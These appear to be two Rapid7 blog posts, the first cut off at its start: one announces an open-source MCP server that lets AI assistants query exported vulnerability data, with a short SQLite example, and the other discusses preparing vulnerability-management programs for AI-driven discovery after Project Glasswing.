Rather than leave every team to solve that challenge from scratch, we wanted to provide a stronger foundation that is flexible, practical, and easy to extend over time. With projects like Metasploit and Velociraptor, Rapid7 is committed to Open Source, and by sharing with the broader community we hope to accelerate velocity and ensure we’re able to incorporate more use cases and fixes. These processes also give customers full visibility of the code running and tools used, ensuring data privacy and allowing the user to do with their data what they please.  

What MCP does

Model Context Protocol, or MCP, is an emerging standard for helping AI systems interact with external data and tools in a structured way.

In practical terms, it gives AI assistants a cleaner way to ask questions, retrieve data, and work with systems beyond the model itself. For customers, that means less custom glue code and a more consistent way to use security telemetry in AI-driven workflows.

That matters because many security reporting and analysis workflows still assume a high technical bar. Answering a simple question can require custom queries, SQL knowledge, or dashboard work. But the people who need those answers aren’t always security specialists. They may be IT partners, compliance stakeholders, or executives who want clarity but might not need to understand the underlying query logic.

The MCP server helps lower that barrier: Instead of starting with raw exports and working backward, teams can start with the question they need answered.

The bigger picture: MCP and CTEM

This approach also aligns with the broader shift toward continuous threat exposure management, or CTEM. 

CTEM is about helping teams move beyond point-in-time findings toward a more continuous, contextual understanding of risk. That requires security data that can be accessed, connected, and used across the workflows teams rely on. 

Bulk Export helps make that possible by giving customers more flexibility in how they use Rapid7 data. The open-source MCP server makes it easier to bring that data into AI-assisted and custom workflows.


That can support more continuous exposure management workflows by making it easier for teams to triage vulnerability and exposure data. For example, an analyst facing a large queue of new vulnerabilities could use LLM assistance to quickly narrow in on the findings most likely to need attention first. Instead of manually working through exports and queries, they could ask natural-language questions to surface the exposures tied to critical assets, unresolved remediation work, or other signals available in the data.

From data portability to AI-ready interoperability

Bulk Export was already an important step toward giving customers more control over their data. It made it easier to extract and use security telemetry in external tools and analytics environments.

The open-source MCP server builds on that foundation: Instead of using exported data only for dashboards or custom reporting, customers can now use that same data in AI-native experiences. That includes internal assistants, private copilots, workflow automation, and natural-language exploration of vulnerability and exposure data. This makes existing security data easier to use in the environments customers are already investing in.

How it works

At a high level, the architecture is straightforward. Using the Agent Skill, your LLM runs the MCP server locally and automatically prepares the environment by performing the bulk export and loading the data into a local file store. The Agent Skill provides the schemas and knowledge, while the MCP server provides the tools to access the data. The LLM can then answer any question by querying, summarizing, and synthesizing data locally, a process that is extremely fast and simple for the LLM.

Depending on the data a customer exports, answers can include vulnerability records, asset data, remediated vulnerabilities, and policy-related results.
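As an illustration of the local-replica idea, and not the actual server code (the export format and field names below are hypothetical), a tool can load exported records into SQLite and answer questions with ordinary queries:

```python
import json
import sqlite3

# Hypothetical bulk-export records; real field names may differ
EXPORT = json.dumps([
    {"asset": "web-01", "cve": "CVE-2026-0001", "severity": 9.8, "remediated": False},
    {"asset": "web-01", "cve": "CVE-2026-0002", "severity": 5.3, "remediated": True},
    {"asset": "db-01",  "cve": "CVE-2026-0003", "severity": 8.1, "remediated": False},
])

def load_replica(export_json: str) -> sqlite3.Connection:
    """Build the local offline replica that the LLM's tools would query."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE vulns (asset TEXT, cve TEXT, severity REAL, remediated INTEGER)")
    rows = [(r["asset"], r["cve"], r["severity"], int(r["remediated"]))
            for r in json.loads(export_json)]
    conn.executemany("INSERT INTO vulns VALUES (?, ?, ?, ?)", rows)
    return conn

def open_critical(conn, threshold=7.0):
    """'Which unremediated findings are critical?' expressed as SQL."""
    cur = conn.execute(
        "SELECT asset, cve FROM vulns WHERE severity >= ? AND remediated = 0 "
        "ORDER BY severity DESC", (threshold,))
    return cur.fetchall()

conn = load_replica(EXPORT)
print(open_critical(conn))  # → [('web-01', 'CVE-2026-0001'), ('db-01', 'CVE-2026-0003')]
```

The point of the local replica is exactly this shape of interaction: instead of paging a remote API per question, the assistant runs cheap queries against data it already holds.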

The point here isn't just that a model can access the data; it's that an open-source layer is something customers can inspect, adapt, and extend over time, giving teams control over how that connection works in their own environment.

What customers can do with it

This opens the door to practical use cases, including:

  • Using LLM assistance to triage vulnerability data faster 

  • Asking natural-language questions to spot exposure and remediation trends

  • Investigating which assets are tied to the most urgent vulnerabilities

  • Understanding what changed over time without manual analysis

  • Exploring policy failures without building manual queries

  • Feeding Rapid7 telemetry into private AI assistants and internal workflows

  • Making reporting more accessible for non-technical stakeholders


For teams already trying to operationalize AI, this creates a lower-friction path. Instead of building every integration from the ground up, they can start with a reusable bridge and focus on the workflows they want to enable.

A better path from data to action

Security data only creates value when teams can use it. For many organizations, turning raw telemetry into timely answers is still harder than it should be. Analysts need speed. Leaders need clarity. Builders need flexibility. And more customers want security data that works inside the tools and workflows they already rely on.

The open-source MCP server for Bulk Export is designed to help make that possible.

Bulk Export helps customers take control of their data. This is the next step: helping them put that data to work in AI-ready security workflows.

Ready to explore it for yourself? Visit the Rapid7 Bulk Export MCP Server project on GitHub to learn more and get started.

Project Glasswing and the Next Challenge for Defenders: Turning Faster Discovery into Faster Action

20 April 2026 at 12:20

Anthropic’s Project Glasswing has sparked plenty of discussion about what AI might soon do for vulnerability discovery, but the more useful question for most security teams is how to prepare for, and more importantly seize the opportunity of, what comes next.

 As we wrote in our earlier blog, What Project Glasswing Means for Security Leaders, AI is becoming more capable of finding software flaws. The pressure that follows lands on the teams responsible for deciding what matters, validating risk, assigning ownership, and getting remediation moving across environments that were already hard to manage. We believe that the organizations that will benefit most from the next wave of AI will be the ones that understand their environment well enough to use these emerging AI models with intent, rather than layering them onto immature processes and hoping that speed alone will solve the backlog.

What this moment means for security teams

The number of publicly tracked software vulnerabilities has broken records almost every year over the last decade, while supply chain risk has continued to rise. Most teams were already feeling the strain of more findings than they could process cleanly. The Common Vulnerabilities and Exposures (CVE) program, the standard system for identifying and tracking known vulnerabilities, recorded 48,185 disclosures in 2025, a 20% increase over 2024, with roughly 40% of those disclosed vulnerabilities rated high or critical. 

By early 2026, the pace was already working out to well over a hundred new CVEs per day. That tells you something important about the current environment: the challenge is not a lack of findings, but converting a growing stream of findings into measurable risk reduction.

The reality is that very few organizations are going to hand a model free rein over their most sensitive environments the minute those capabilities become more widely available. Trust will be built in stages: early adoption is much more likely to focus on backlog reduction, triage support, patch testing, and repetitive lower-tier remediation work that consumes time without carrying the same level of operational risk as the most critical systems in the business. That is a more realistic starting point, and it leads to a more useful question. Before teams apply AI more broadly, they need to understand their environment well enough to use it intentionally.

Establish the foundation before layering in AI

The promise from Project Glasswing and almost every other AI-powered security initiative is quite similar: leverage AI to identify patterns, summarize risk, suggest fixes, and speed up repetitive work. Regardless of technology, success still depends on how well an organization understands its environment, the context around each finding, and the process used to act on it.

A model can generate more output than a team ever could on its own, but that output becomes noise if the organization cannot answer basic questions about scope, ownership, criticality, and exposure. Teams need a clear, continuously updated picture of the environment before they can decide where AI should be applied, what should remain human-led, and which parts of the backlog are safe to push through more automated workflows.

The AI landscape is already shifting fast, and it will keep shifting, which is why this moment should prompt a more preemptive and resilient strategy rather than another round of tooling hype. Chasing each new capability as it arrives will inevitably force teams to keep reorganizing around the latest announcement. A stronger path is to get the foundation right first: understand the environment, the attack paths, and the assets that matter most, and, most importantly, establish the process and the people behind these decisions. Then use AI where it meaningfully improves speed, consistency, and focus.

Why Attack Surface Management should be part of that foundation

A strong foundation starts with visibility. Security teams need a live picture of what exists in the environment, what is exposed, how assets connect to one another, and which systems carry the greatest business impact if something goes wrong. That is where Attack Surface Management becomes central. Rapid7’s approach through Surface Command is built around a continuous view of the attack surface across the digital estate, which helps teams understand where exposures sit and how they relate to internet-facing, business-critical, or otherwise high-impact systems.

That matters for AI adoption just as much as it matters for day-to-day security operations. Teams cannot apply AI strategically if they are guessing about which parts of the environment are lower priority, which assets belong to which owners, or where a newly disclosed flaw could create real business risk. A better view of the attack surface gives organizations the context they need to segment the problem properly. That makes it far easier to start with the right use cases, whether that is backlog reduction in lower-impact systems, targeted prioritization of exposed assets, or faster triage where the risk picture is already well understood.

Ownership is part of that foundation too. Remediation slows down when no one can quickly identify who owns the affected application, environment, or workflow. Security teams already lose time there today, and AI will only make that bottleneck more visible if it starts surfacing issues faster than organizations can assign them. Attack Surface Management helps turn that ambiguity into something more actionable by tying exposure to environment context and likely ownership.

How Vulnerability and Exposure Management turns visibility into action

Once the environment is understood, teams still need a way to move from findings to outcomes. That is where Vulnerability and Exposure Management becomes the operating layer that keeps the work grounded.

The biggest value here is not simply collecting more vulnerability data. It is targeted prioritization and validation. When a disclosure lands, teams need to know whether the issue affects an exposed asset, whether there is evidence of exploitation or attacker interest, whether the impacted system is business-critical, and whether existing controls already reduce some of the risk. That is the kind of context that helps organizations decide what deserves immediate attention and what can be handled through a normal remediation cycle.

This is where artificial intelligence can help move remediation forward faster. Instead of asking teams to manually connect exploit signals, asset criticality, and vulnerability intelligence on their own, AI can distill that context directly in the remediation workflow. That makes it easier to understand why an issue matters, what the likely impact is, and what to do next, which shortens the gap between discovery and a confident decision on how to respond.

We expect most organizations to use AI to assist with, or in some cases take over, lower-tier triage, backlog cleanup, summary generation, and patch support in areas where the workflow is already established and the blast radius is more manageable. Human experts still stay closest to the most critical business logic, the most sensitive environments, and the most complex remediation paths. That is a practical adoption model, and it only works when the organization already has enough structure in place to know where those boundaries are.

Curated vulnerability intelligence changes the quality of decisions

That kind of deliberate adoption only works when teams can make better decisions, faster. Security teams need more than severity scores and a long list of CVEs. They need enough context to understand what matters, what can wait, and where action will reduce real risk fastest. As Rapid7 outlined in The Power of Curated Vulnerability Intelligence, the goal is to identify the vulnerabilities that actually matter and give teams enough context to act with confidence.

That intelligence provides a form of validation that most teams need badly as disclosure volume rises. It helps answer whether a finding is tied to active attacker interest, whether proof-of-concept activity is public, whether the asset is exposed, and whether delaying a patch creates unacceptable risk. It also supports the decisions that happen in the gap between discovery and full remediation. When a patch is delayed because of change controls, testing constraints, or lack of a vendor fix, teams still need to reduce exposure. Curated intelligence helps them decide whether to use segmentation, access restrictions, configuration changes, added monitoring, or virtual patching while the longer-term fix is being worked through.

That is one of the clearest ways Rapid7 helps customers move from data to outcomes. Intelligence is fused into the workflow so teams can prioritize with more precision and validate their actions against real threat context, not just generalized scores.

How runtime and remediation fit into the broader AI story

There is another part of this story that matters as organizations think more seriously about AI-driven security operations. As AI shapes the way teams handle exposures earlier in the lifecycle, context of application at runtime matters more too.

To make that foundation complete, organizations need to look beyond static posture and bring runtime validation into the picture. When teams can identify which vulnerabilities and misconfigurations are actively exploitable in production, and map sensitive data and identity access to real-world attack paths, they get a much clearer view of actual risk. Security teams need to understand what is vulnerable, how systems behave when live, and where unusual activity may suggest a problem is moving toward exploitation. With that runtime context in place, teams can spend less time chasing theoretical vulnerabilities and more time focusing on the exposures that are actively creating risk in live environments. 

That connection between exposure, intelligence, remediation, and runtime behavior is where AI starts to become genuinely useful rather than simply impressive. It supports a more intentional model of security decision-making, one that narrows the gap between what is found, what matters, and what happens next.

What security leaders should do now

This is a good time for security leaders to step back and ask a more disciplined set of questions.

  • Do we understand our environment well enough to direct AI toward the right problems? 

  • Can we clearly separate higher-risk, higher-impact assets from the parts of the backlog that are mostly operational drag? 

  • Is threat intelligence embedded in how we interpret findings, or are we still depending too heavily on raw severity? 

  • Can we identify ownership fast enough for AI-assisted triage to result in meaningful action? 

  • Are compensating controls part of the plan when remediation cannot happen immediately?

Those questions shape the quality of everything that follows.

Glasswing creates a real opportunity for security teams that are ready to use AI with more intention. AI can move work forward faster, reduce manual drag, and absorb classes of issues that currently consume time without improving outcomes. The teams that benefit most will not be the ones that rush to apply new models everywhere. They will be the ones that understand their environment, have a clear view of their attack surface, have mature enough workflows to apply AI where it makes sense, and can measure whether the actions taken actually reduced exposure.

Rapid7’s approach to building resilience is grounded in those same needs. Attack Surface Management provides the environmental foundation, Vulnerability Management drives prioritization and action, curated vulnerability intelligence strengthens validation and decision-making, AI-generated remediation insights compress the time from discovery to the next step, and runtime security adds context where live behavior matters. Together, those pieces help customers build a security program that is ready for AI rather than constantly reacting to it.
